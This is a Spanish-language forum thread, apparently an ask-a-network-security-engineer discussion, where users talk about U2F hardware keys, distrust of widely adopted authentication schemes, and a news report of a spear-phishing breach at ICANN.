Soy ingeniero de seguridad de redes y respondo

Kartalon

#90 Basicamente una llave USB que actua como segundo factor de verificacion, analogo al chip&pin de las tarjetas de credito:

http://googleonlinesecurity.blogspot.co.uk/2014/10/strengthening-2-step-verification-with.html

http://fidoalliance.org/adoption/video/yubico-fido-alliance-universal-2nd-factor-u2f-demonstration

Nucklear

#87 Pues de U2F opino que está bien, pero que a mayor masa de usuarios mas inseguro se hará como todo en este mundo. El dia que alguien consiga spoofear uno de esos dispositivos la protección quedará utilizada. A mi parecer unificar el segundo factor de autenticación es un error.

Pero bueno como podeis ver soy bastante paranoico con estas cosas, y suelo intentar evitar servicios y software que tengan una gran masa critica. Si me quieren petar que diseñen un ataque específico contra mi y no que lancen una bateria de ataque spor defecto y me pillen. No se si me explico...xD

2 respuestas
kaitoo

#92 Eres paranoico de cojones, tu podrias ser un buen manager de un equipo de seguridad. Deberia de aprender un poco de ti y ser mas paranoico lol

edit: http://www.darknet.org.uk/2014/12/icann-hacked-including-root-dns-systems/

Otros mas que caen , si a los hackers les da por acceder a los root DNS (no debe de ser nada facil, y con la informacion que han extraido no tendran suficiente) y follarse los registros voy a cobrar el doble pronto :D

Attackers sent staff spoofed emails appearing to coming from icann.org. The organization notes it was a “spear phishing” attack, suggesting employees clicked on a link in the messages, and then typed their usernames and passwords into a bogus webpage, providing hackers with the keys to their accounts.

Otro caso mas de layer8 :qq:

bornex

#90 Estoy (espero) en mi ultimo año de carrera de Ingenieria Informática. No se que master haré, gracias por la info.

leonsegui

#56 siempre al pie del cañon